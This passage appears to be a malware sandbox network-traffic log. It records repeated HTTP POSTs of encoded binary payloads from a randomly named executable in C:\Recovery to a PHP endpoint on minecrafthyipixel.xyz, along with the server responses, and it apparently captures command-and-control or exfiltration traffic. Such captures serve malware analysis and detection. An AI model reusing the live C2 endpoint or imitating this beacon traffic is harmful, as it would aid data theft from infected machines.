                                                                                                                                    Data Ascii: tqJTCBZjOXaQMlDviWTpZD8mcfQqQeFoo6/NDJt65MCdgDgu7FJGKJKH8pTUWuccjo1jcFnMvX1qQuZjywefsmBa1KBl+YKHbNVlAqP2U37VOA1bFogcdWVSXPyJwdO6BFhf1eRoez4dIOrGM0tHpcF3ZHj1MtdkuXU9/NkAesPZuRu8zAldoQqcDQIfRGAQdwPFo53I8d45++gaG/qq/P+urJ54I1hbYraR2tfRJeG/tBVOVWP
                                                                                                                                    Apr 19, 2024 13:42:37.501439095 CEST5156OUTData Raw: 5a 58 30 42 2b 77 47 39 70 7a 66 6d 50 62 55 4e 55 41 73 2f 56 65 30 55 31 4d 6b 32 31 2b 43 6d 6d 62 4e 6e 4f 49 33 48 32 7a 66 75 70 63 32 42 30 2b 44 7a 2b 63 37 53 55 34 34 39 56 31 46 5a 69 50 74 56 56 31 38 4c 55 4e 31 65 64 72 50 67 4d 55
                                                                                                                                    Data Ascii: ZX0B+wG9pzfmPbUNUAs/Ve0U1Mk21+CmmbNnOI3H2zfupc2B0+Dz+c7SU449V1FZiPtVV18LUN1edrPgMUtlqt2N1zJY1rXqjDJHz/sPYaju6D2y7lNld+7Fv4hqGVGfv0ea3whTL4LNhzBcoD/SgQqDxvbn3l8bNfxo8VKhMTQjC9L5VeLCgAfidwqFAQfGMbjlGE/uFr0PZFiJ3bIUqMJxvqxk7KcMogUZt6/DZ9NLPa0pPi2
                                                                                                                                    Apr 19, 2024 13:42:37.606069088 CEST7734OUTData Raw: 32 5a 67 67 51 38 76 37 58 41 74 59 6b 4d 62 6b 5a 73 46 44 62 4d 56 6b 2b 55 54 74 71 5a 33 73 75 46 33 58 75 70 68 61 32 65 62 70 68 36 37 4b 6a 4f 4d 50 52 6e 35 70 6d 4a 54 48 7a 6c 6c 38 63 46 7a 55 67 43 74 70 41 41 6f 55 57 4d 79 43 6a 61
                                                                                                                                    Data Ascii: 2ZggQ8v7XAtYkMbkZsFDbMVk+UTtqZ3suF3Xupha2ebph67KjOMPRn5pmJTHzll8cFzUgCtpAAoUWMyCjaBW1q8mPhIb3vF/uSYbT6qMf5DoKtvehPbYN3gF+kkrNneIZN0ra2oPq996wC32PYSVkA9+5wsXkWnBM9WtuVceqRi1yrqH80uULeW1Hg+If/PenNmw/ShWMMh103NsjjzCWH4BRxSrTRnvr9CuVv3t69Fz8lujDUq
                                                                                                                                    Apr 19, 2024 13:42:37.607110977 CEST30936OUTData Raw: 72 69 65 45 70 35 70 41 35 4b 37 43 4b 51 58 41 56 37 4d 76 70 7a 59 4a 4a 30 35 63 4d 58 4c 54 58 65 2b 48 6e 79 33 58 6f 43 42 35 53 44 4d 64 52 53 4a 36 46 53 56 46 6e 4b 4c 72 49 72 70 2b 67 4f 49 43 59 74 43 6b 39 55 53 33 4e 6c 45 69 4f 4b
                                                                                                                                    Data Ascii: rieEp5pA5K7CKQXAV7MvpzYJJ05cMXLTXe+Hny3XoCB5SDMdRSJ6FSVFnKLrIrp+gOICYtCk9US3NlEiOKdGrvUAdQputk+Ta2KA2U4hLV5urcnvran40nlwy2aUyaN63OblenXlN5T9SZjnsF7QoYRFpHYx5M1aKiS6mKkCYQLQVpOC9QXLtaZHb2Vj91aV3eUoWRDHSyL10OOBDG6QA/CVbamJ2U4qOGjcv28AG9/CdbQQRLW
                                                                                                                                    Apr 19, 2024 13:42:37.647424936 CEST2578OUTData Raw: 7a 4c 32 76 7a 52 4d 69 36 58 2f 56 39 45 6e 63 4e 61 47 2f 4c 42 31 4b 49 54 68 72 36 6f 69 64 66 59 56 4c 31 75 75 35 56 61 77 6a 51 4e 72 55 64 55 6a 2f 48 49 62 49 35 52 76 2b 59 52 32 4a 48 46 39 56 57 49 52 57 6e 71 6d 6a 35 2f 57 58 73 2b
                                                                                                                                    Data Ascii: zL2vzRMi6X/V9EncNaG/LB1KIThr6oidfYVL1uu5VawjQNrUdUj/HIbI5Rv+YR2JHF9VWIRWnqmj5/WXs+G4Vyq32w08YkrQE5LhfXT5pXwimayqqq2D7ai22+Si9gGbMKzfBU+FCvwlrNUmM/axy7sT+BhY/eM/K+8NEZm1UewSrivUE8VJAbVWr3P3iBNnKrJRgL7PN6TWMvuLaZkfB2KsCYoQ70KwsGBmNN8vz0tskFU00Zs
                                                                                                                                    Apr 19, 2024 13:42:37.710979939 CEST2578OUTData Raw: 71 44 50 5a 52 4e 79 54 37 68 48 35 4f 57 4c 41 55 39 39 79 74 51 53 45 38 56 75 38 37 4c 6f 78 75 49 58 39 42 65 62 76 33 5a 74 37 48 6a 7a 70 39 59 6b 4b 78 71 74 59 77 43 66 5a 66 38 4d 63 42 75 6c 50 49 64 74 52 58 56 34 47 42 4e 63 6b 2f 72
                                                                                                                                    Data Ascii: qDPZRNyT7hH5OWLAU99ytQSE8Vu87LoxuIX9Bebv3Zt7Hjzp9YkKxqtYwCfZf8McBulPIdtRXV4GBNck/rErhA35QILrmIttqIvea7mbhRL0c/9bogb1qqRR7BzwR3deE0+aBl2qoQKe0tu0GfCWt8xYB9Ktgzz8XjTKoGr5gxDd1R9g17SFAoQ4xbpAyiuAD+NhyxW1Bl0dI8F0ZxLbGBGcQto6fJ/+sJElB4bfnyqvAkk/0EG
                                                                                                                                    Apr 19, 2024 13:42:37.711033106 CEST2578OUTData Raw: 72 63 68 70 6c 42 6d 53 67 58 7a 39 62 57 38 42 72 54 30 66 7a 4c 71 62 65 67 79 65 76 62 62 49 74 62 58 5a 32 79 48 55 6e 53 65 70 33 5a 4e 73 52 6c 47 61 34 6a 66 4e 72 6d 70 5a 78 65 72 51 70 63 79 50 42 6a 2b 68 58 49 30 45 6c 5a 70 32 4b 30
                                                                                                                                    Data Ascii: rchplBmSgXz9bW8BrT0fzLqbegyevbbItbXZ2yHUnSep3ZNsRlGa4jfNrmpZxerQpcyPBj+hXI0ElZp2K0/Z56hkHwLeDf7HnI4sVVVjEvYmijYhEPGbMNlAf1zghj3npnhwiUfQ9Jfkl4u0OGqEVrJF0j9b7+6rqhEy8UriqUgy4W5ZJN9XK8WUbMWR4M01xWHiJjkhLOJ8Yq1hovkQwnWmPjhGYgj8VDE5GlQvQUtRuOeuIVu
                                                                                                                                    Apr 19, 2024 13:42:37.711054087 CEST2578OUTData Raw: 72 63 33 4d 58 78 36 6b 56 77 30 39 71 30 49 6c 63 77 31 74 33 55 62 4d 30 4d 4a 4b 44 46 65 68 45 4a 75 45 43 4e 30 72 4d 6c 4a 63 54 4c 4a 6a 6b 71 33 78 44 42 32 63 71 73 33 4e 34 72 6c 6e 7a 6c 59 6e 2f 56 6b 67 6d 65 42 52 31 69 55 62 4a 7a
                                                                                                                                    Data Ascii: rc3MXx6kVw09q0Ilcw1t3UbM0MJKDFehEJuECN0rMlJcTLJjkq3xDB2cqs3N4rlnzlYn/VkgmeBR1iUbJzK2Fwqc5WgAYf5pPJYJ2d/lXmCbuTktMy8CLPHyTgGvU0Vweomz2Tun7ZRIXaQo1tLzokYMk6QiVxmuXUUg5Pxr5Fhl35oPQ6SLP5LRJwbDwRNZF+ntZ2KQpb3E6Sk6ugOySYbpIr+bilRIcxSHp0rTn47iDaiLnQ6


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.449748104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:37.369956970 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:37.474834919 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:37.474993944 CEST2512OUTData Raw: 52 5d 5b 58 59 45 51 58 5c 5e 59 59 57 51 58 52 54 54 5f 5d 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][XYEQX\^YYWQXRTT_]T^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>* +?'0'><&<S1+5 1>*+# 8]9$[. X =
                                                                                                                                    Apr 19, 2024 13:42:37.821958065 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:37 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1AapU2v5p3tt9B6JVQrv0p8pv9Im29iBQAVHO39kx6nYL3TxKEcQ5aXbWmlRvpS1n%2B4SrJQB%2BNWA3nAM%2BfmtZSMP7hoS%2Bs6rjp4xwhJs%2F62amjwlKBpbRmVFEs4VZkbnjIRwBCN9Yk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1dbe91cb0dc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:37.822020054 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.449751104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:38.147696972 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:38.252191067 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:38.252365112 CEST2512OUTData Raw: 52 58 5e 5a 59 46 51 5d 5c 5e 59 59 57 5f 58 5f 54 51 5f 57 54 58 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^ZYFQ]\^YYW_X_TQ_WTXSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1=2U"+$35?(+%9T%;=#>87]"/,.$[. X
                                                                                                                                    Apr 19, 2024 13:42:38.599740982 CEST613INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:38 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJktfo96U3ThBx3jI4IycIG8aKYvFRkHzR23XmvLc1TUT5dlfbtPHqP3mg6QA9Op73yC3QMo1OEcixHE3NRImvU6tKpFDjPXAiHA86wMBLx3pIt5rllh43bt38aPuz4VBQVwD6LBFR8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1e0ccc8b0eb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:38.599802971 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.449752104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:38.868902922 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:38.973742008 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:38.974040985 CEST2512OUTData Raw: 57 5a 5b 58 59 46 54 54 5c 5e 59 59 57 50 58 59 54 56 5f 5e 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[XYFTT\^YYWPXYTV_^T^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&=2"$#''(1T?((%_$W%;5 "V>+'\ ,].%$[. X
                                                                                                                                    Apr 19, 2024 13:42:39.323674917 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzBmuAsWVwgCKUfuI6v7qPnpjMgSCMlSl0XLmJXJhiTrvGwtR2Ui1A2LC9cHDxnosaDq2u4Kl7%2Bo9jdXvXe56BnmPS0wGYZ4fpjhB8Cl4W0%2Bv18UqtObictqxj5btVCvCdbSXwS6B%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1e54fc94557-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:39.323707104 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.449754104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:39.549010038 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:39.653772116 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:39.654067039 CEST2512OUTData Raw: 52 58 5b 5c 5c 40 54 54 5c 5e 59 59 57 50 58 5c 54 51 5f 5c 54 5f 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[\\@TT\^YYWPX\TQ_\T_S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-56?'0<0;2>1T%]*P#">8?[ ? /5$[. X


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.449755104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:39.810117006 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:39.915143013 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:39.915489912 CEST2172OUTData Raw: 57 59 5e 5f 59 45 54 5b 5c 5e 59 59 57 51 58 5e 54 51 5f 5b 54 5b 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^_YET[\^YYWQX^TQ_[T[SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]'>168?'03]$8-Q=(#&91;-426T)'] 0]:%$[. X =
                                                                                                                                    Apr 19, 2024 13:42:40.272536039 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNBuSHbdgx7h54CtgaE1CbGLPSXHCfrbSDmmDIGLsaf9einxrUFsq2Nkiu8xH87Uvrcbekr8rTUYGmJO38suUsrXk68Wv67ej%2BpbW8kBb%2Fn6P1xJ25RmHvnJI1Yia9khqGI6gvP%2Bcnk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1eb2fef4593-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 01 27 36 36 14 22 2a 20 04 3d 0d 2e 58 29 24 29 16 3d 39 2d 19 34 03 1d 0f 2f 3a 20 5c 2b 28 39 06 24 30 31 19 27 13 0a 1a 25 20 21 59 00 1a 39 58 22 2c 3d 1f 2c 29 0b 5a 2a 21 00 02 34 0b 3b 5a 2b 2e 2d 17 37 01 24 07 3c 00 3d 53 38 2b 30 18 3c 2b 21 15 3b 19 3a 16 36 3b 2c 52 09 12 26 0c 2a 2b 3b 07 31 1e 00 08 20 22 34 5d 3c 3c 31 05 30 28 30 57 24 33 06 5f 2d 0c 3a 1d 26 3e 0b 54 29 2a 2b 0c 37 3c 07 19 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98''66"* =.X)$)=9-4/: \+(9$01'% !Y9X",=,)Z*!4;Z+.-7$<=S8+0<+!;:6;,R&*+;1 "4]<<10(0W$3_-:&>T)*+7<2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:40.272599936 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    11192.168.2.449756104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:39.973391056 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:40.078299046 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:40.078471899 CEST2512OUTData Raw: 52 5e 5b 5b 5c 41 51 59 5c 5e 59 59 57 55 58 59 54 55 5f 5f 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[[\AQY\^YYWUXYTU__T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2=15;,Y0383])P*8 2<&= ".Q+(8#.5$[. X -
                                                                                                                                    Apr 19, 2024 13:42:40.414064884 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTe3cjHntT8tfRxXtjSo4EKx8Z114z48k209XYIz2fSXJPeRhDm6NF%2F%2BQHywP4ssSBkwGzg41tSTK7W0vznzE2Wl1Uxlf59rm02A6CuycBx6mcB4a%2F5%2FMWFqjDYYNcp3Lsf7I75iwh4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1ec2a89b074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:40.414129972 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.449757104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:40.642226934 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:40.746690035 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:40.746898890 CEST2512OUTData Raw: 57 59 5e 58 59 47 51 5e 5c 5e 59 59 57 52 58 5f 54 5b 5f 56 54 5c 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^XYGQ^\^YYWRX_T[_VT\SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&..5'?^$=;8&*'2.P!2")8;#/?95$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:41.306287050 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tIyLNdv0WX2hcSPbq0lY2GAQHcm6cDvGJYWxdl45fpMN8oWdrInNRfEatTVPFyd4%2FmAnHF4yZtS39IiHb37%2Bdpnib5gMEWUXIh1oGa0CPvEmv%2Birde%2F8%2FJ7mafASSUE48JHI46eTlzA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1f05d8b44e8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:41.306350946 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    13192.168.2.449758104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
